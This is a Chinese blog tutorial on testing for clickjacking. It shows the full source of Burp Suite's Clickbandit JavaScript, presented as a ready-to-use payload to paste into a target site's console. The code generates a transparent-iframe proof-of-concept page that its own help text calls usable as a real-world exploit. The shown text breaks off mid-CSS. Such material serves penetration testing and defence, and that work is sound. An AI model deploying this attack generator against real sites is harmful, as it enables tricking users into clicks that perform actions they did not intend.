渗透测试成长篇-点击劫持漏洞

最新推荐文章于 2024-05-24 15:55:12 发布
最新推荐文章于 2024-05-24 15:55:12 发布
阅读量4.8k 收藏 14
点赞数 3
分类专栏: 安全 文章标签: html html5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51186260/article/details/119924852
版权

1.前言

点击劫持就是一种视觉上的欺骗手段,攻击者使用一个透明的、不可见的iframe,覆盖在一个网页上,然后诱使用户在该网页上进行操作,此时用户在不知情的情况下点击了透明的iframe页面。通过调整iframe页面的位置,可以诱使用户恰好点击在iframe页面的一些功能性按钮上,攻击者常常配合社工手段完成攻击。(一般能被劫持就是网站缺少X-FRAME-OPTIONS)

************  点击劫持一般在渗透测试中比较常见

2.过程

如何测试,有两种方法,今天就讲一种最简单常用的方式(burpsuite模块)

在这里就用测过的一个站点做例子吧

1)这是一个正常的站点

 2)我们需要打开burpsuite,选择burp模块,再去选择一个点击劫持模块

3)复制payload,然后打开刚才的站点,选择开发者模式

4)把复制的payload粘贴到console模块

5)payload如下,可以直接使用

/* Copyright PortSwigger Ltd. All rights reserved. Usage is subject to the Burp Suite license terms. See https://portswigger.net for more details. */
!function(){
    var initialZoomFactor = '1.0', win, doc, width, height, clicks = [];
    function addClickTrap(element, minusY) {
        var clickTrap = doc.createElement('div'), cords = findPos(element);
        clickTrap.style.backgroundColor = 'none';
        clickTrap.style.border = 'none';
        clickTrap.style.position = 'absolute';
        clickTrap.style.left = cords[0] + 'px';
        clickTrap.style.top = cords[1] + 'px';
        clickTrap.style.width = element.offsetWidth + 'px';
        clickTrap.style.height = element.offsetHeight + 'px';
        if(element.zIndex || element.zIndex === '0') {
            clickTrap.style.zIndex = +element.zIndex+1;
        }
        clickTrap.style.opacity = '0.5';
        clickTrap.style.cursor = 'pointer';
        clickTrap.clickTrap = 1;
        clickTrap.addEventListener('click', function(e) {
            generatePoc({x:e.pageX, y: minusY?e.pageY-minusY : e.page});
            e.preventDefault();
            e.stopPropagation();
            return false;
        }, true);
        doc.body.appendChild(clickTrap);
    }
    function addMessage(msg) {
        var message = document.createElement('div');
            message.style.width = '100%';
            message.style.height = '20px';
            message.style.backgroundColor = '#fff5bf';
        message.style.border = '1px solid #ff9900';
        message.style.padding = '5px';
        message.style.position = 'fixed';
        message.style.bottom = '0';
        message.style.left = '0';
        message.style.zIndex = 100000;
        message.style.textAlign = 'center';
        message.style.fontFamily = 'Arial';
        message.style.color = '#000';
        message.appendChild(document.createTextNode(msg));
        document.body.appendChild(message);
        setTimeout(function() {
            document.body.removeChild(message);
        }, 4000);
    }
    function htmlEscape(str) {
        str = str + '';
        return str.replace(/[^\w :\-\/.?=]/gi, function(c){
            return '&#' + (+c.charCodeAt(0))+';';
        });
    }
    function getDocHeight(D) {
        return Math.max(
            D.body.scrollHeight, D.documentElement.scrollHeight,
            D.body.offsetHeight, D.documentElement.offsetHeight,
            D.body.clientHeight, D.documentElement.clientHeight
        );
    }
    function getDocWidth(D) {
        return Math.max(
            D.body.scrollWidth, D.documentElement.scrollWidth,
            D.body.offsetWidth, D.documentElement.offsetWidth,
            D.body.clientWidth, D.documentElement.clientWidth
        );
    }
    function findPos(obj) {
        var left = 0, top = 0;
        if(obj.offsetParent) {
            while(1) {
              left += obj.offsetLeft;
              top += obj.offsetTop;
              if(!obj.offsetParent) {
                break;
              }
              obj = obj.offsetParent;
            }
        } else if(obj.x && obj.y) {
            left += obj.x;
            top += obj.y;
        }
        return [left,top];
      }
    function generatePoc(config) {
        var html = '', child = '', elementWidth = 1, elementHeight = 1, maxWidth = width, maxHeight = height, cords, zoomIncrement = 1, desiredX = 200, desiredY = 200, parentOffsetWidth, parentOffsetHeight,
            element = config.element, x = config.x, y = config.y, pixelMode = false;
        if(config.clickTracking) {
            elementWidth = config.clickTracking[0].width;
            elementHeight = config.clickTracking[0].height;
            x = config.clickTracking[0].left;
            y = config.clickTracking[0].top;
            zoomIncrement = 1;
            config.currentPosition = 0;
        } else {
            config.clickTracking = [];
            if(element) {
                elementWidth = element.offsetWidth;
                elementHeight = element.offsetHeight;
                cords = findPos(element);
                x = cords[0];
                y = cords[1];
                zoomIncrement = 1;
            } else {
                zoomIncrement = 5;
                pixelMode = true;
            }
        }
        parentOffsetWidth = desiredX - x;
        parentOffsetHeight = desiredY - y;
        child = btoa('<script>window.addEventListener("message", function(e){ var data, childFrame = document.getElementById("childFrame"); try { data = JSON.parse(e.data); } catch(e){ data = {}; } if(!data.clickbandit){ return false; } childFrame.style.width = data.docWidth+"px";childFrame.style.height = data.docHeight+"px";childFrame.style.left = data.left+"px";childFrame.style.top = data.top+"px";}, false);<\/script><iframe src="'+htmlEscape(self.location)+'" scrolling="no" style="width:'+(+maxWidth)+'px;height:'+(+maxHeight)+'px;position:absolute;left:'+parentOffsetWidth+'px;top:'+parentOffsetHeight+'px;border:0;" frameborder="0" '+(window.clickbandit.sandbox?'sandbox="allow-same-origin    '+htmlEscape(document.getElementById('sandboxIframeInput').value)+'" ':'')+'id="childFrame" οnlοad="parent.postMessage(JSON.stringify({clickbandit:1}),\'*\')"><\/iframe>');
        html += '<body>\n';
        html += '<div id="container" style="clip-path:none;clip:auto;overflow:visible;position:absolute;left:0;top:0;width:100%;height:100%">\n';
        html += '<!-- Clickjacking PoC Generated by Burp Suite Professional -->\n';
        html += '<input id="clickjack_focus" style="opacity:0;position:absolute;left:-5000px;">\n';
        html += '<div id="clickjack_button" style="opacity:0;-webkit-transform-style: preserve-3d;-moz-transform-style: preserve-3d;transform-style: preserve-3d;text-align:center;font-family:Arial;font-size:100%;width:'+elementWidth+'px;height:'+elementHeight+'px;z-index:0;background-color:red;color:#fff;position:absolute;left:'+(+desiredX)+'px;top:'+(+desiredY)+'px"><div style="position:relative;top: 50%;transform: translateY(-50%);">Click<\/div><\/div>\n';
        html += '<!-- Show this element when clickjacking is complete -->\n';
        html += '<div id="clickjack_complete" style="display:none;-webkit-transform-style: preserve-3d;-moz-transform-style: preserve-3d;transform-style: preserve-3d;font-family:Arial;font-size:16pt;color:red;text-align:center;width:100%;height:100%;"><div style="position:relative;top: 50%;transform: translateY(-50%);">You\'ve been clickjacked!<\/div></div>\n';
        html += '<iframe id="parentFrame" src="data:text/html;base64,'+child+'" frameborder="0" scrolling="no" style="-ms-transform: scale('+initialZoomFactor+');-ms-transform-origin: '+desiredX+'px '+desiredY+'px;transform: scale('+initialZoomFactor+');-moz-transform: scale('+initialZoomFactor+');-moz-transform-origin: '+desiredX+'px '+desiredY+'px;-o-transform: scale('+initialZoomFactor+');-o-transform-origin: '+desiredX+'px '+desiredY+'px;-webkit-transform: scale('+initialZoomFactor+');-webkit-transform-origin: '+desiredX+'px '+desiredY+'px;opacity:0.5;border:0;position:absolute;z-index:1;width:'+maxWidth+'px;height:'+maxHeight+'px;left:0px;top:0px"><\/iframe>\n';
        if(pixelMode) {
            html += '<svg id="circle" style="position:absolute;z-index:0;left:'+(desiredX-100)+'px;top:'+(desiredY-50)+'px;"><circle cx="100" cy="50" r="40" stroke="red" fill="none" stroke-width="1" /></svg>';
        }
        html += '</div>\n';
        function generateClickArea(pos) {
            var elementWidth, elementHeight, x, y, parentFrame = document.getElementById('parentFrame'), desiredX = 200, desiredY = 200, parentOffsetWidth, parentOffsetHeight, docWidth, docHeight,
                btn = document.getElementById('clickjack_button');
            if(pos < window.clickbandit.config.clickTracking.length) {
                clickjackCompleted(false);
                elementWidth = window.clickbandit.config.clickTracking[pos].width;
                elementHeight = window.clickbandit.config.clickTracking[pos].height;
                btn.style.width = elementWidth + 'px';
                btn.style.height = elementHeight + 'px';
                window.clickbandit.elementWidth = elementWidth;
                window.clickbandit.elementHeight = elementHeight;
                x = window.clickbandit.config.clickTracking[pos].left;
                y = window.clickbandit.config.clickTracking[pos].top;
                docWidth = window.clickbandit.config.clickTracking[pos].documentWidth;
                docHeight = window.clickbandit.config.clickTracking[pos].documentHeight;
                parentOffsetWidth = desiredX - x;
                parentOffsetHeight = desiredY - y;
                parentFrame.style.width = docWidth+'px';
                parentFrame.style.height = docHeight+'px';
                parentFrame.contentWindow.postMessage(JSON.stringify({clickbandit: 1, docWidth: docWidth, docHeight: docHeight, left: parentOffsetWidth, top: parentOffsetHeight}),'*');
                calculateButtonSize(getFactor(parentFrame));
                showButton();
                if(parentFrame.style.opacity === '0') {
                    calculateClip();
                }
            } else {
                resetClip();
                hideButton();
                clickjackCompleted(true);
            }
        }
        function handleMessages(e){
            var data;
            try {
                data = JSON.parse(e.data);
            } catch(e){
                data = {};
            }
            if(!data.clickbandit) {
                return false;
            }
            showButton();
        }
        function clickjackCompleted(show) {
            var complete = document.getElementById('clickjack_complete');
            if(show) {
                complete.style.display = 'block';
            } else {
                complete.style.display = 'none';
            }
        }
        function showButton() {
            var btn = document.getElementById('clickjack_button');
            btn.style.opacity = 1;
        }
        function hideButton() {
            var btn = document.getElementById('clickjack_button');
            btn.style.opacity = 0;
        }
        html += '<script>';
        html += findPos;
        html += generateClickArea;
        html += hideButton;
        html += showButton;
        html += clickjackCompleted;
        html += 'window.addEventListener("message", '+handleMessages+',false);';
        html += 'window.addEventListener("blur", function(){ if(window.clickbandit.mouseover) { hideButton();setTimeout(function(){ generateClickArea(++window.clickbandit.config.currentPosition);document.getElementById("clickjack_focus").focus();},1000); } }, false);';
        html += 'document.getElementById("parentFrame").addEventListener("mouseover",function(){ window.clickbandit.mouseover = true; }, false);';
        html += 'document.getElementById("parentFrame").addEventListener("mouseout",function(){ window.clickbandit.mouseover = false; }, false);';
        html += '<\/script>';
        html += '<script>';
        html += 'window.clickbandit={mode: "review", mouseover:false,elementWidth:'+elementWidth+',elementHeight:'+elementHeight+',config:'+JSON.stringify(config)+'};';
        html += calculateClip;
        html += calculateButtonSize;
        html += resetClip;
        html += getFactor;
        html += '<\/script>';
        function getFactor(obj) {
            if(typeof obj.style.transform === 'string') {
                return obj.style.transform.replace(/[^\d.]/g,'');
            }
            if(typeof obj.style.msTransform === 'string') {
                return obj.style.msTransform.replace(/[^\d.]/g,'');
            }
            if(typeof obj.style.MozTransform === 'string') {
                return obj.style.MozTransform.replace(/[^\d.]/g,'');
            }
            if(typeof obj.style.oTransform === 'string') {
                return obj.style.oTransform.replace(/[^\d.]/g,'');
            }
            if(typeof obj.style.webkitTransform === 'string') {
                return obj.style.webkitTransform.replace(/[^\d.]/g,'');
            }
            return 1;
        }
        function calculateButtonSize(factor) {
            var btn = document.getElementById('clickjack_button'), resizedWidth = Math.round(window.clickbandit.elementWidth * factor), resizedHeight = Math.round(window.clickbandit.elementHeight * factor);
            btn.style.width = resizedWidth + 'px';
            btn.style.height = resizedHeight + 'px';
            if(factor > 100) {
                btn.style.fontSize = '400%';
            } else {
                btn.style.fontSize = (factor * 100) + '%';
            }
        }
        function calculateClip() {
            var btn = document.getElementById('clickjack_button'), w = btn.offsetWidth, h = btn.offsetHeight, container = document.getElementById('container'), x = btn.offsetLeft, y = btn.offsetTop;
            container.style.overflow = 'hidden';
            container.style.clip = 'rect('+y+'px, '+(x+w)+'px, '+(y+h)+'px, '+x+'px)';
            container.style.clipPath = 'inset('+y+'px '+(x+w)+'px '+(y+h)+'px '+x+'px)';
        }
        function resetClip() {
            var container = document.getElementById('container');
            container.style.overflow = 'visible';
            container.style.clip = 'auto';
            container.style.clipPath = 'none';
        }
        html += '<!-- Configuration -->\n';
        function toggleTransparency() {
            var parentFrame=document.getElementById('parentFrame');
            if(parentFrame.style.opacity === '0.5') {
                parentFrame.style.opacity=0.0001;
                calculateClip();
            } else {
                parentFrame.style.opacity=0.5;
                resetClip();
            }
        }
        function transform(element, property, amount) {
            var factor = 1;
            element.style[property] = element.style[property].replace(/[\d.]+/,function(d){
                d = +d;
                if(amount < 0) {
                    if(d === 1) {
                        factor = d;
                        return factor;
                    }
                    factor = d-Math.abs(amount);
                    return factor;
                } else {
                    factor = d+amount;
                    return factor;
                }
            });
            return factor;
        }
        function zoom(amount) {
            var parentFrame=document.getElementById('parentFrame'), factor = 1,
                circle = document.getElementById('circle');
            if(typeof parentFrame.style.transform === 'string') {
                factor = transform(parentFrame, 'transform', amount);
            }
            if(typeof parentFrame.style.msTransform === 'string') {
                factor = transform(parentFrame, 'msTransform', amount);
            }
            if(typeof parentFrame.style.MozTransform === 'string') {
                factor = transform(parentFrame, 'MozTransform', amount);
            }
            if(typeof parentFrame.style.oTransform === 'string') {
                factor = transform(parentFrame, 'oTransform', amount);
            }
            if(typeof parentFrame.style.webkitTransform === 'string') {
                factor = transform(parentFrame, 'webkitTransform', amount);
            }
            if(factor) {
                calculateButtonSize(factor);
            }
            if(circle) {
                if(factor === 1) {
                    circle.style.display = "block";
                } else {
                    circle.style.display = "none";
                }
            }
            if(parentFrame.style.opacity === '0') {
                calculateClip();
            } else {
                resetClip();
            }
        }
        function moveIframe(e) {
            var parentFrame = document.getElementById('parentFrame'), arrow = false;
            switch(e.keyCode) {
                case 37:
                    parentFrame.style.left = ((parseInt(parentFrame.style.left.replace(/[^\d-]+/,'')))-1)+'px';
                    arrow = true;
                break;
                case 38:
                    parentFrame.style.top = ((parseInt(parentFrame.style.top.replace(/[^\d-]+/,'')))-1)+'px';
                    arrow = true;
                break;
                case 39:
                    parentFrame.style.left = ((parseInt(parentFrame.style.left.replace(/[^\d-]+/,'')))+1)+'px';
                    arrow = true;
                break;
                case 40:
                    parentFrame.style.top = ((parseInt(parentFrame.style.top.replace(/[^\d-]+/,'')))+1)+'px';
                    arrow = true;
                break;
            }
            if(arrow) {
                e.preventDefault();
            }
        }
        html += '<script>';
        html += addMessage+createStyles+generateCssString+createHeader+toggleTransparency+zoom+transform+moveIframe+';document.addEventListener("keydown",moveIframe,false);addMessage("Use the controls above to control the zoom and transparency.");createStyles(document, document.body);createHeader(document, document.body);';
        html += '<\/script>';
        html += '<style>#menu { position:absolute;left:210px;top:25px;z-index:10000;font-family:Arial;margin:0;padding:0;list-style:none; } #menu li {float:left;margin-right:5px;}</style>';
        html += '<ul id="menu">';
        html += '<li><a href="#" οnclick="zoom('+(zoomIncrement*-1)+');return false;" class="btn">-</a></li>';
        html += '<li><a href="#" οnclick="zoom('+zoomIncrement+');return false;" class="btn">+</a></li>';
        html += '<li><a href="#" οnclick="toggleTransparency();return false;" class="btn">Toggle transparency<\/a></li>';
        html += '<li><a href="#" οnclick="self.location.reload();return false;" class="btn">Reset<\/a></li>';
        html += '<li><a href="#" οnclick="generateClickArea(window.clickbandit.config.currentPosition=0);document.getElementById(\'clickjack_complete\').style.display=\'none\';this.href=\'data:text/html;base64,\'+btoa(document.body.innerHTML.replace(/<![-]{2} Configuration [-]{2}>[\\d\\D]+$/,\'\'))" download="clickjacked.html" class="btn">Save</a></li>';
        html += '</ul>';
        html += '</body>';
        document.write(html);
    }
    function start() {
        var frame = document.getElementById('clickbandit_frame');
        if(window.clickbandit.sandbox) {
            frame.sandbox = 'allow-same-origin ' + document.getElementById('sandboxIframeInput').value;
            if(!/allow-scripts/i.test(document.getElementById('sandboxIframeInput').value)) {
                    win = window;
                    doc = document;
                    addClickTrap(frame, 70);
            }
        } else {
            frame.removeAttribute('sandbox');
        }
        win = frame.contentWindow;
        doc = win.document;
        win.location = location+'';
        addMessage('Please click on the elements you wish to clickjack. Then click finish.');
        clicks = [];
    }
    function recordClicks(element, x, y) {
        var cords = findPos(element);
        clicks.push({
            width: element.offsetWidth,
            height: element.offsetHeight,
            mouseX: x,
            mouseY: y,
            left: cords[0],
            top: cords[1],
            documentWidth: getDocWidth(doc),
            documentHeight: getDocHeight(doc)
        });
    }
    function finish() {
        if(clicks.length) {
            generatePoc({clickTracking: clicks});
        } else {
            alert("You need to click on some elements first.");
        }
    }
    function interceptClicks() {
        var elements, i;
        elements = doc.querySelectorAll('iframe,embed,object,applet');
        for(i=0;i<elements.length;i++) {
            addClickTrap(elements[i]);
        }
        win.addEventListener('click', function(e) {
            var element = e.target || e.srcElement;
            if(element.clickTrap || element === document.body) {
                return false;
            }
            recordClicks(element,e.pageX,e.pageY);
            if(window.clickbandit.disableClickActions) {
                e.preventDefault();
                e.stopPropagation();
                return false;
            }
        }, true);
    }
    function removeNodes(node) {
        while(node.firstChild) {
            node.removeChild(node.firstChild);
        }
    }
    function createHeader(doc, node) {
        var header = doc.createElement('div'), bar = doc.createElement('div'), logoContainer = doc.createElement('div'), clickBanditLogo = doc.createElement('img'),
            anchor = doc.createElement('a'), help = doc.createElement('a'), mode = doc.createElement('h1');
        header.style.position = 'relative';
        header.style.zIndex = 10000;
        logoContainer.style.backgroundColor = '#fff';
        logoContainer.style.width = '100%';
        logoContainer.style.height = '70px';
        clickBanditLogo.src = 'data:image/png;base64,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';
        clickBanditLogo.style.cssFloat = 'left';
        clickBanditLogo.style.width = '200px';
        clickBanditLogo.style.height = '23px';
        clickBanditLogo.style.position = 'relative';
        clickBanditLogo.style.top = '22px';
        clickBanditLogo.style.left = '5px';
        anchor.href = 'https://portswigger.net/burp/help/suite_functions_clickbandit.html';
        anchor.target = '_blank';
        anchor.appendChild(clickBanditLogo);
        logoContainer.appendChild(anchor);
        header.appendChild(logoContainer);
        bar.style.backgroundColor = '#f4983b';
        bar.style.width = '100%';
        bar.style.height = '10px';
        bar.style.clear = 'both';
        header.appendChild(bar);
        node.appendChild(header);
        help.href = '#';
        help.onclick = function() {
            var contents = '<style>'+generateCssString()+'body{margin:10px;}</style>', win;
            contents += '<p style="float:right"><a href="#" οnclick="self.close()" class="btn">Close</a></p>';
            if(window.clickbandit.mode === 'record') {
                contents += '<h1><span>Record mode</span></h1>';
                contents += '<p>Burp Clickbandit first loads in record mode. Click start to load the site. Perform one or more mouse clicks to record your clickjacking attack. Typically, this will involve performing the mouse clicks that the victim user needs to perform to carry out some desired action.</p>';
                contents += '<p>By default, as clicks are recorded, they are also handled in the normal way by the target page. You can use the "disable click actions" checkbox to record clicks without the target page handling them.</p>';
                contents += '<p>You can click the sandbox iframe checkbox to add the sandbox attribute to the iframe, this option will allow you to avoid frame busters.</p>';
                contents += '<p>When you have finished recording, click the "Finish" button to enter review mode.</p>';
            } else {
                contents += '<h1><span>Review Mode</span></h1>';
                contents += '<p>When you have finished recording your attack, Burp Clickbandit enters review mode. This lets you review the generated attack, with the attack UI overlaid on the original page UI. You can click the buttons on the attack UI to verify that the attack works.</p>';
                contents += '<p>The following commands are available in review mode:</p>';
                contents += '<ul>';
                contents += '<li>The + and - buttons can be used to zoom in and out.</li>';
                contents += '<li>The "toggle transparency" button lets you show or hide the original page UI.</li>';
                contents += '<li>The "reset" button restores the generated attack, as it was before any further clicks were made.</li>';
                contents += '<li>The "save" button saves an HTML file containing the attack. This can be used as a real-world exploit of the clickjacking vulnerability.</li>';
                contents += '<li>You can use the keyboard arrow keys to reposition the attack UI if is not correctly aligned with the original page UI.</li>';
                contents += '</ul>';
            }
            win = window.open('about:blank','help','width=500,height=500');
            win.document.write(contents);
        };
        help.className = 'btn';
        help.style.position = 'absolute';
        help.style.right = '10px';
        help.style.top = '15px';
        help.appendChild(doc.createTextNode("?"));
        if(window.clickbandit && window.clickbandit.mode === 'record') {
            mode.appendChild(doc.createTextNode('Record mode'));
        } else {
            mode.appendChild(doc.createTextNode('Review mode'));
        }
        mode.style.position = 'absolute';
        mode.style.right = '50px';
        mode.style.top = '0px';
        header.appendChild(help);
        header.appendChild(mode);
        return header;
    }
    function createMenu(node) {
        var div = document.createElement('div'), div2 = document.createElement('div');
        div.style.position = 'absolute';
        div.style.left = '210px';
        div.style.top = '25px';
        div.style.backgroundColor = '#fff';
        div.style.color = '#000';
        div.innerHTML = '<form><ul id="menu"><li><input type="checkbox" id="sandboxIframeCheckbox" οnclick="var iframeInput=document.getElementById(\'sandboxIframeInput\');if(this.checked){ iframeInput.style.display=\'block\';window.clickbandit.sandbox = true; } else { iframeInput.style.display=\'none\';window.clickbandit.sandbox = false; }" /><label>Sandbox iframe?</label><input style="display:none" type="text" value="allow-scripts allow-forms" id="sandboxIframeInput" /></li><li><a href="#" class="btn" οnclick="clickbandit.start();return false;">Start</a></li><li><a href="#" class="btn" οnclick="clickbandit.finish();return false;">Finish</a></li></ul></form>';
        node.appendChild(div);
        div2.style.position = 'absolute';
        div2.style.top = '40px';
        div2.style.right = '50px';
        div2.innerHTML = '<input type="checkbox" id="disableClickActions" οnclick="if(this.checked){ window.clickbandit.disableClickActions = true; } else { window.clickbandit.disableClickActions = false; }" /> <label style="color:#000;" for="disableClickActions">Disable click actions</label>';
        node.appendChild(div2);
    }
    function disableStyles() {
        var i, j, styleSheet, rule, xDomain;
        for(var i=0;i<document.styleSheets.length;i++) {
            styleSheet = document.styleSheets[i];
            styleSheet.disabled = true;
        }
    }
    function generateCssString() {
        var css = '';
            css += 'body {';
            css += 'font-family:Arial;';
            css += 'margin:0;';
            css += 'padding:0;';
            css += '}';
            css += '#menu {';
            css += 'float:right;';
            css += 'margin:0;';
            css += 'padding:0;';
            css += 'list-style:none;';
            css += 'background-color:#fff;';
            css += '}';
            css += '#menu li {';
            css += 'float:left;margin-right:10px;';
            css += '}';
            css += '.btn {';
              css += 'background: #f4973a;';
              css += 'background-image: -webkit-linear-gradient(top, #f4973a, #e06228);';
              css += 'background-image: -moz-linear-gradient(top, #f4973a, #e06228);';
              css += 'background-image: -ms-linear-gradient(top, #f4973a, #e06228);';
              css += 'background-image: -o-linear-gradient(top, #f4973a, #e06228);';
